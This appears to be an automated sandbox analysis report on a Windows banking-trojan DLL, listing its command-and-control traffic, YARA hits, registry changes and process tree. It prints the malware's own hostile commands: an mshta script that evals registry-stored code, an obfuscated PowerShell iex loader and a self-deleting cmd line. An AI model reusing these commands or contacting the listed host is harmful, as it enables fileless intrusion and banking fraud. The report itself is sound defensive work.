Windows Analysis Report
3r0Cgcbr8c

Source: Joe Sandbox View

ASN Name: NANO-ASLV NANO-ASLV

Source: global traffic	HTTP traffic detected: GET /drew/50s8s_2Fm/cVudhHX9qhkwnZn8YGEa/1_2FluFvn0rgITgZHrA/wgcOmIc7KszdPMRNYAwCGU/riR21HHqBfnky/h3W8R7X2/i4XUx7MW7pUIRFpHREax99S/CeaSmQqUkf/_2FQJb20GfOBx67Hv/vcYd4qEFb5vs/GCAhrG_2F_2/Fs8jogZPWA_2BZ/E84C3VPBHuhbD17con0IW/u18AFJcaJWYZ53TT/SBbkABZO2lEW2gv/N0JCn4zxEtu_2BD1lC/F07n5Kpw2LWAlyB/hwLOToT.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/OSTJnRYC4zjelPJW6mG/gXMl3RMKVOjRbJPPa5LO4N/1Rxca_2F8A1aY/E126oqKr/0279Bk28zUYxyGQ02cXgMGF/yFegILAP2b/3VKiN5lxSx_2FPh9f/ZTGqvy3nxXPq/B88IJ3AaBrK/hehSLqzEdCxRJ1/mV_2Faq9kIMkm5am4HCp_/2BcasekpSJlaNdYM/uwSh2fQGSeZmzq0/0l0TRMfPI2PnVenXIP/yafOG_2F4/7NG5BpfBOdFnWKJyfxTy/93phrANBQTz/RgbfZKr.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/WXsBbTk_2FBXBK/mS8Hu3n2DbeYWVwpxggIZ/cAzhqJf7aBOMcFyZ/ERg2cki7hXSFbet/cCn9kY_2Baq8v2FrSn/Rei5wg7J9/Qsu_2FMujMKTcbcDzJ0J/AhSY_2BVu9QQM_2FYvA/N7OdLSd3CjR0pY4_2FFyUB/GOmdiT9hoha13/v02bkkOg/EJzbMo_2FrexM_2BofdpAOE/xgFjJDpwMl/8SxBhJlVDNq8aMCyL/7JDY3gS5rUN7/gZQ5T5rpdKF/AFQ_2BiwFrwd7d/YmSmnBkM9/kco.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.115.8

Source: rundll32.exe, 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: rundll32.exe, 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd

Source: global traffic	HTTP traffic detected: GET /drew/50s8s_2Fm/cVudhHX9qhkwnZn8YGEa/1_2FluFvn0rgITgZHrA/wgcOmIc7KszdPMRNYAwCGU/riR21HHqBfnky/h3W8R7X2/i4XUx7MW7pUIRFpHREax99S/CeaSmQqUkf/_2FQJb20GfOBx67Hv/vcYd4qEFb5vs/GCAhrG_2F_2/Fs8jogZPWA_2BZ/E84C3VPBHuhbD17con0IW/u18AFJcaJWYZ53TT/SBbkABZO2lEW2gv/N0JCn4zxEtu_2BD1lC/F07n5Kpw2LWAlyB/hwLOToT.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/OSTJnRYC4zjelPJW6mG/gXMl3RMKVOjRbJPPa5LO4N/1Rxca_2F8A1aY/E126oqKr/0279Bk28zUYxyGQ02cXgMGF/yFegILAP2b/3VKiN5lxSx_2FPh9f/ZTGqvy3nxXPq/B88IJ3AaBrK/hehSLqzEdCxRJ1/mV_2Faq9kIMkm5am4HCp_/2BcasekpSJlaNdYM/uwSh2fQGSeZmzq0/0l0TRMfPI2PnVenXIP/yafOG_2F4/7NG5BpfBOdFnWKJyfxTy/93phrANBQTz/RgbfZKr.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/WXsBbTk_2FBXBK/mS8Hu3n2DbeYWVwpxggIZ/cAzhqJf7aBOMcFyZ/ERg2cki7hXSFbet/cCn9kY_2Baq8v2FrSn/Rei5wg7J9/Qsu_2FMujMKTcbcDzJ0J/AhSY_2BVu9QQM_2FYvA/N7OdLSd3CjR0pY4_2FFyUB/GOmdiT9hoha13/v02bkkOg/EJzbMo_2FrexM_2BofdpAOE/xgFjJDpwMl/8SxBhJlVDNq8aMCyL/7JDY3gS5rUN7/gZQ5T5rpdKF/AFQ_2BiwFrwd7d/YmSmnBkM9/kco.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match	File source: 00000002.00000003.277089715.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277155521.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.327048178.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328107644.0000000004ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.323863639.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277582302.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277005147.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.276805211.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277047889.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277544043.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.276930570.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 1928, type: MEMORYSTR
Source: Yara match	File source: 2.3.rundll32.exe.4c86b40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4c86b40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4bda4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4c594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4bda4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.326908581.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.396215708.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.394439164.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.395073730.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.326960112.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: loaddll32.exe, 00000000.00000002.260175696.00000000016FB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Disables SPDY (HTTP compression, likely to perform web injects)

Source: Yara match	File source: 00000002.00000003.277089715.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277155521.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.327048178.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328107644.0000000004ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.323863639.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277582302.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277005147.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.276805211.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277047889.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277544043.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.276930570.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 1928, type: MEMORYSTR
Source: Yara match	File source: 2.3.rundll32.exe.4c86b40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4c86b40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4bda4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4c594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4bda4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.326908581.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.396215708.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.394439164.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.395073730.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.326960112.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

Writes registry values via WMI

System Summary

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: 3r0Cgcbr8c.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 3r0Cgcbr8c.dll

Binary or memory string: OriginalFilenamemyfile.exe$ vs 3r0Cgcbr8c.dll

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: 3r0Cgcbr8c.dll

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 3r0Cgcbr8c.dll

ReversingLabs: Detection: 30%

Source: 3r0Cgcbr8c.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll",#1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Soxq='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Soxq).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gjvyfiw -value gp; new-alias -name huwuvwioi -value iex; huwuvwioi ([System.Text.Encoding]::ASCII.GetString((gjvyfiw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hvnxdzw.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE3E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1476D44366854E63BD1CA8712B7CCE92.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iig1japh.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2B5B.tmp" "c:\Users\user\AppData\Local\Temp\CSC8E8486282EA843C08CB8749684F1E69.TMP"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\3r0Cgcbr8c.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gjvyfiw -value gp; new-alias -name huwuvwioi -value iex; huwuvwioi ([System.Text.Encoding]::ASCII.GetString((gjvyfiw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hvnxdzw.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iig1japh.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE3E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1476D44366854E63BD1CA8712B7CCE92.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2B5B.tmp" "c:\Users\user\AppData\Local\Temp\CSC8E8486282EA843C08CB8749684F1E69.TMP"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\3r0Cgcbr8c.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220428

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yympvmax.25e.ps1

Source: classification engine

Classification label: mal100.bank.troj.evad.winDLL@21/17@0/1

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll",#1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{E417A292-F301-B6DE-9D58-D74A210CFB1E}
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{CC41BA86-BB92-DEE8-A5C0-1FF2A9F4C346}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3C7A50C2-6B10-CE6A-D530-CFE2D9647336}

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: 3r0Cgcbr8c.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.388328984.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.391223035.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\in\the\town\where\ahung.pdb source: 3r0Cgcbr8c.dll
Source:	Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.388328984.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.391223035.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp

Source: 0hvnxdzw.dll.19.dr	Static PE information: real checksum: 0x0 should be: 0xbdb6
Source: iig1japh.dll.21.dr	Static PE information: real checksum: 0x0 should be: 0xcc07
Source: 3r0Cgcbr8c.dll	Static PE information: real checksum: 0x79835 should be: 0x9dbdd

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hvnxdzw.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iig1japh.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hvnxdzw.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iig1japh.cmdline	Jump to behavior

